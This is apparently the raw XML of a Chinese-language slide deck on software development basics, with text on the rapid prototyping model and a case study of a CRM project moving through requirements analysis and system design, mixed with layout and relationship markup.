            <a:fld id="{565CE74E-AB26-4998-AD42-012C4C1AD076}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="文本占位符 18"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5416550" y="3176905"/>
            <a:ext cx="727710" cy="3594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lvl1pPr marL="0" marR="0" lvl="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" lvl="1" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" lvl="2" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" lvl="3" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" lvl="4" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>01</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="756920" y="2937510"/>
            <a:ext cx="3886200" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="90170" tIns="46990" rIns="90170" bIns="46990" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:def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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>单击此处编辑</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="221615"/>
            <a:ext cx="8169910" cy="886460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="016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99650" y="392836"/>
            <a:ext cx="10515600" cy="576984"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>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KSO_Shape"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7613570" y="484085"/>
            <a:ext cx="383120" cy="383120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 171957 w 576064"/>
              <a:gd name="connsiteY0" fmla="*/ 96048 h 576064"/>
              <a:gd name="connsiteX1" fmla="*/ 171957 w 576064"/>
              <a:gd name="connsiteY1" fmla="*/ 480016 h 576064"/>
              <a:gd name="connsiteX2" fmla="*/ 502964 w 576064"/>
              <a:gd name="connsiteY2" fmla="*/ 288032 h 576064"/>
              <a:gd name="connsiteX3" fmla="*/ 288032 w 576064"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 576064"/>
              <a:gd name="connsiteX4" fmla="*/ 576064 w 576064"/>
              <a:gd name="connsiteY4" fmla="*/ 288032 h 576064"/>
              <a:gd name="connsiteX5" fmla="*/ 288032 w 576064"/>
              <a:gd name="connsiteY5" fmla="*/ 576064 h 576064"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 576064"/>
              <a:gd name="connsiteY6" fmla="*/ 288032 h 576064"/>
              <a:gd name="connsiteX7" fmla="*/ 288032 w 576064"/>
              <a:gd name="connsiteY7" fmla="*/ 0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064" h="576064">
                <a:moveTo>
                  <a:pt x="171957" y="96048"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="171957" y="480016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502964" y="288032"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="288032" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="447108" y="0"/>
                  <a:pt x="576064" y="128956"/>
                  <a:pt x="576064" y="288032"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="576064" y="447108"/>
                  <a:pt x="447108" y="576064"/>
                  <a:pt x="288032" y="576064"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="128956" y="576064"/>
                  <a:pt x="0" y="447108"/>
                  <a:pt x="0" y="288032"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="128956"/>
                  <a:pt x="128956" y="0"/>
                  <a:pt x="2880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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="38" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="10505200" y="447095"/>
            <a:ext cx="1409700" cy="479425"/>
            <a:chOff x="633" y="230"/>
            <a:chExt cx="1226" cy="417"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39"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6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="176950" y="455484"/>
            <a:ext cx="432854" cy="432854"/>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grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="3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ldLvl="0" animBg="1"/>
    </p:bld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1B8B2A2-61C4-4EB0-86FB-F394674D733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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="图表&#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5" y="1384300"/>
            <a:ext cx="9706610" cy="4091305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Freeform 9"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>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Freeform 13"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4839550" y="1381374"/>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Freeform 17"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>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Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="1612216" y="301163"/>
            <a:ext cx="3203932" cy="181898"/>
          </a:xfrm>
          <a:prstGeom prst="homePlate">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="8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1" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>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Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="271703" y="851177"/>
            <a:ext cx="4531458"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Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>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文本框 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7634729" y="2602886"/>
            <a:ext cx="4288354" cy="1323439"/>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谢谢观看</a:t>
            </a:r>
            <a:endPar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28" name="直接连接符 27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6349998" y="43848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userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9879748" y="458427"/>
            <a:ext cx="1877060" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="squar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文本框 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8147690" y="4618806"/>
            <a:ext cx="3262432" cy="400110"/>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9" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5295995" y="133020"/>
            <a:ext cx="2749035" cy="934920"/>
            <a:chOff x="633" y="230"/>
            <a:chExt cx="1226" cy="417"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10"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2"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3"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36" name="图片 35" descr="模糊的照片上写着字&#10;&#10;中度可信度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103" y="5609657"/>
            <a:ext cx="4886325" cy="1247775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="灯片编号占位符 36"/>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transition/>
  <p:hf hdr="0" ftr="0" dt="0"/>
</p:sldLayout>
</file>

<file path=ppt/slideMasters/_rels/slideMaster1.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tags" Target="../tags/tag19.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0"/>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48.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.jpe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jpe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50.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51.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52.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jpe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3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide126.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3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide127.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62.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.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6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3.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image" Target="../media/image68.pn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image" Target="../media/image69.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide137.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3.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138.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3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74.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image" Target="../media/image7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jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.jpe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image" Target="../media/image77.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3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.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image" Target="../media/image80.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jpe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3.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153.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3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.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image" Target="../media/image86.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide155.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3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide156.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3.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image" Target="../media/image92.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3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.pn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image" Target="../media/image95.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xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide1.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag42.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag41.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag40.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag39.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag38.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag37.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag36.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag35.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag34.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag33.xml"/><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tags" Target="../tags/tag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2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2.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5.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.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8.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hyperlink" Target="https://wiki.mbalib.com/wiki/%E6%8A%80%E6%9C%AF%E9%A3%8E%E9%99%A9" TargetMode="External"/><Relationship Id="rId1"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5.jpe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6.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en-US" altLang="zh-CN"/>
              <a:t>web security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:t>软件开发基本知识</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9506585" y="5097780"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>孙肖文</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">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其他软件开发方法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2135505"/>
            <a:ext cx="4638040" cy="2586990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>快速原型模型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>快速原型模型又称原型模型，它是增量模型的另一种形式；它是在开发真实系统之前，构造一个原型，在该原型的基础上，逐渐完成整个系统的开发工作。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="853440" y="5638165"/>
            <a:ext cx="5911215" cy="528955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>适用场景：需求复杂、难以确定、动态变化的软件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>系统</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7153910" y="1133475"/>
            <a:ext cx="4686935" cy="5598160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:rand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案例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>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84200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>背景：某上市公司</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>拥有一套成熟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CRM(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>客户关系管理系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，经过与潜在客户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>公司接触，通过售前等商业行为顺利中标，中标后客户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会和中标公司</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>签署合同，此时项目正式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>启动。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233045" y="1893570"/>
            <a:ext cx="11334750" cy="1536065"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、需求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>分析：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>项目启动之后第一步重要的工作就是去收集客户方</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>公司的具体需求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>编写需求文档，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>需要与客户进行需求的评审，确认需求文档的准确性和完整性。要根据需求文档绘制出系统的原型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图，一般需求人员会带领开发人员</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一起。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>产出物：系统的最终</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>版需求文档、系统的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>原型图。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7033895" y="2938780"/>
            <a:ext cx="4181475" cy="3848100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="815975" y="3524885"/>
            <a:ext cx="4857115" cy="2938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案例分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、系统设计：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>根据需求文档和系统原型图进行架构设计、详细设计</a:t>
            </a:r>
            <a:r>
